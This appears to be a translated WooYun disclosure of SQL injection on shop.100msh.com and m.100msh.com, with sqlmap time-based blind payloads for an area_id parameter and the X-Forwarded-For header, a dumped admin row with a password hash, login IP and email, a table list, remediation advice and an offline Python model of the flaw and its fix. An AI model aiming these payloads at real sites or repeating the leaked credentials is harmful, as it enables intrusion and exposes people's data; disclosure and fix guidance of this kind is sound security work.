Vulnerability summary
Defect ID: wooyun-2015-0104645
Title: SQL injection in multiple 百米生活 (100msh.com) sites
Vendor: 百米生活
Author: crypt
Submitted: 2015-03-31 15:19
Fix time: 2015-05-15 15:20
Disclosed: 2015-05-15 15:20
Type: SQL injection
Severity: High
Self-assessed rank: 12
Status: vendor could not be contacted, or vendor actively ignored the report
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-03-31: vendor being contacted and awaiting vendor acknowledgement; details not disclosed
2015-05-15: vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
Detailed description:
百米生活 (100msh) deploys free commercial Wi-Fi to build a local community e-commerce platform in cities across China. It offers merchants product promotion, brand marketing, merchant management and cost control, and gives consumers information on nearby shopping, food, housing, transport and entertainment, using the free Wi-Fi to support a mobile-internet lifestyle.
The shop.100msh.com and m.100msh.com sites are vulnerable to SQL injection and their databases can be dumped.
shop.100msh.com
Injection point: http://shop.100msh.com/index/set_area?area_id=57
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: area_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: area_id=57' AND (SELECT * FROM (SELECT(SLEEP(5)))MUWQ) AND 'rStO'='rStO
---
back-end DBMS: MySQL >= 5.0.0
Database: 100msh_admin
Table: anl_admin_users
[5 entries; the dump on the page shows two rows, the second cut off]
Columns (25): user_id, group_id, user_img, is_email, is_mobile, user_name, user_phone, user_chats, user_email, user_fax_no, user_gender, user_status, user_mobile, user_address, user_zipcode, user_regdate, user_cert_no, cash_account, user_birthday, last_login_ip, user_realname, point_account, user_password, last_login_time, second_level_pwd
Row 1: user_id=1, group_id=3, user_name=wzw, user_status=1, user_regdate=1, last_login_ip=113.88.238.245, user_realname=SupserRoot, user_password=a87a7a8701db961210ab6ef55ad9ac3c (32 hex characters, MD5-length, no visible salt), last_login_time=1396010502, second_level_pwd empty; all other columns 0
Row 2 (truncated in the dump): user_id=2, group_id=3, user_img=0, is_email=0, is_mobile=0, user_name=admin, user_phone empty, user_chats=a:2:{s:3:"MSN";s:0:"";s:2:"QQ";s:0:"";} (PHP-serialized array), user_email=tiqer@100msh.com, user_fax_no=0, user_gender=1, user_status=1; remaining columns not recovered
m.100msh.com
Injection via the X-Forwarded-For request header
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: X-Forwarded-For #1* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: 8.8.8.8' AND (SELECT * FROM (SELECT(SLEEP(5)))wsmC) AND 'iDga'='iDga
---
back-end DBMS: MySQL >= 5.0.0
Database: 100msh_partner
[41 tables]
+----------------------------------+
| anl_accessrights |
| anl_admin_access_token |
| anl_admin_minUsers_tmp |
| anl_admin_pos |
| anl_admin_users |
| anl_admin_users_bak |
| anl_login_log |
| anl_partner |
| anl_partner_addition |
| anl_partner_cateqory |
| anl_partner_credit_operation_log |
| anl_partner_credit_points |
| anl_partner_ctag |
| anl_partner_ctag_rel |
| anl_partner_gallery |
| anl_partner_info_aueit |
| anl_partner_level |
| anl_partner_level_rule |
| anl_partner_linyi_osg |
| anl_partner_log |
| anl_partner_peportqd |
| anl_partner_policy |
| anl_partner_policy_domp |
| anl_partner_policy_level |
| anl_partner_prefereqtial |
| anl_partner_prefereqtial_count |
| anl_partner_search_config |
| anl_partner_search_keyword |
| anl_partner_tag_rem |
| anl_partner_tpl_cfg |
| anl_partner_user_search_keyword |
| anl_partner_views |
| anl_partner_views_num_info_all |
| anl_partner_views_nuo_info |
| anl_posadcess |
| anl_positions |
| anl_statecity |
| anl_tag |
| anl_tmp_cmp_msg_rel |
| anl_tmp_wx_partner_msg |
| anl_watermark |
+----------------------------------+
Proof of vulnerability:
(Identical sqlmap output to the detailed description above: the 100msh_admin.anl_admin_users rows and the 41 tables of 100msh_partner.)
Remediation:
Escape and filter the input. Concretely: pass area_id and every other user-controlled value to the database as a bound parameter of a prepared statement instead of concatenating it into the query string; cast area_id to an integer before use; and do not take the client address from X-Forwarded-For unless the request arrives from a trusted reverse proxy, validating the value as an IP address before it is stored.
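The two injection shapes above (a quoted area_id lookup on shop.100msh.com, and a client address taken from X-Forwarded-For on m.100msh.com) and the remediation can be reproduced offline with the following model. This is added example code, not 100msh's application, whose PHP source is not on the page: the query shapes are inferred from the quoting in sqlmap's payloads, the tables anl_statecity and anl_login_log are constructed sample schema that only borrow names from the dump, TRUSTED_PROXIES is an assumed proxy address, and MySQL's SLEEP() is replaced by a counter so that a non-zero count proves the payload reached the SQL engine as code.

```python
import ipaddress
import sqlite3

# Payloads exactly as sqlmap reported them on this page.
AREA_PAYLOAD = "57' AND (SELECT * FROM (SELECT(SLEEP(5)))MUWQ) AND 'rStO'='rStO"
XFF_PAYLOAD = "8.8.8.8' AND (SELECT * FROM (SELECT(SLEEP(5)))wsmC) AND 'iDga'='iDga"

# Assumed: the only peer allowed to set X-Forwarded-For is our own reverse
# proxy.  Any other peer's header is ignored (anyone can send that header).
TRUSTED_PROXIES = {"10.0.0.5"}


class AppModel:
    """In-memory stand-in for the two query shapes behind the report.

    SQLite has no SLEEP(); a stub is registered that only counts calls.
    If it is called, the input was executed as SQL; if not, it stayed data.
    """

    def __init__(self):
        self.sleep_calls = 0
        self.conn = sqlite3.connect(":memory:")
        self.conn.create_function("SLEEP", 1, self._fake_sleep)
        # Constructed sample schema; table names follow the dump above.
        self.conn.executescript("""
            CREATE TABLE anl_statecity (area_id INTEGER PRIMARY KEY, name TEXT);
            INSERT INTO anl_statecity VALUES (57, 'constructed sample area');
            CREATE TABLE anl_login_log (id INTEGER PRIMARY KEY, client_ip TEXT);
        """)

    def _fake_sleep(self, seconds):
        # Real SLEEP(5) would stall the HTTP response ~5 s, which is what
        # sqlmap's time-based check measures.  Here we only record the call.
        self.sleep_calls += 1
        return 0

    # --- shop.100msh.com/index/set_area?area_id=57 ------------------------

    def set_area_vulnerable(self, area_id):
        # Quoted string concatenation: the payload's leading 57' closes the
        # literal and its trailing 'rStO'='rStO re-balances the quotes.
        sql = "SELECT name FROM anl_statecity WHERE area_id = '%s'" % area_id
        return self.conn.execute(sql).fetchall()

    def set_area_fixed(self, area_id):
        # area_id is a numeric key: validate the type, then bind it.
        try:
            area = int(area_id)
        except (TypeError, ValueError):
            return None  # reject the request (HTTP 400 in a real handler)
        sql = "SELECT name FROM anl_statecity WHERE area_id = ?"
        return self.conn.execute(sql, (area,)).fetchall()

    # --- m.100msh.com: client IP taken from X-Forwarded-For ---------------

    def log_login_vulnerable(self, headers, remote_addr):
        # Trusts the header over the socket peer and concatenates it.
        ip = headers.get("X-Forwarded-For", remote_addr)
        sql = "INSERT INTO anl_login_log (client_ip) VALUES ('%s')" % ip
        self.conn.execute(sql)
        self.conn.commit()
        return self.stored_ips()[-1]

    def log_login_fixed(self, headers, remote_addr):
        # Honour X-Forwarded-For only from a trusted proxy, only if its first
        # hop parses as an IP address, and bind the value in every case.
        ip = remote_addr
        xff = headers.get("X-Forwarded-For")
        if xff and remote_addr in TRUSTED_PROXIES:
            first_hop = xff.split(",")[0].strip()
            try:
                ip = str(ipaddress.ip_address(first_hop))
            except ValueError:
                ip = remote_addr
        sql = "INSERT INTO anl_login_log (client_ip) VALUES (?)"
        self.conn.execute(sql, (ip,))
        self.conn.commit()
        return self.stored_ips()[-1]

    def stored_ips(self):
        rows = self.conn.execute("SELECT client_ip FROM anl_login_log ORDER BY id")
        return [r[0] for r in rows]


if __name__ == "__main__":
    app = AppModel()
    app.set_area_vulnerable(AREA_PAYLOAD)
    print("vulnerable set_area: SLEEP calls =", app.sleep_calls)
    app.set_area_fixed(AREA_PAYLOAD)
    print("fixed set_area:      SLEEP calls =", app.sleep_calls)
    app.log_login_vulnerable({"X-Forwarded-For": XFF_PAYLOAD}, "10.0.0.5")
    print("vulnerable log:      SLEEP calls =", app.sleep_calls, "stored =", app.stored_ips()[-1])
    app.log_login_fixed({"X-Forwarded-For": XFF_PAYLOAD}, "10.0.0.5")
    print("fixed log:           SLEEP calls =", app.sleep_calls, "stored =", app.stored_ips()[-1])
```

Two details worth noticing when running it: the vulnerable login log stores the literal text "0" (the boolean result of the injected AND chain) instead of an address, which is the trace a blind-injection probe leaves in a log table; and the fixed header path has to solve two problems at once, the quoting and the trust, because a bound parameter alone would still let any client write an arbitrary string into last_login_ip.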
Copyright: please credit crypt@WooYun when reposting
Vulnerability response
Vendor response:
The vendor could not be reached, or the vendor actively declined to respond.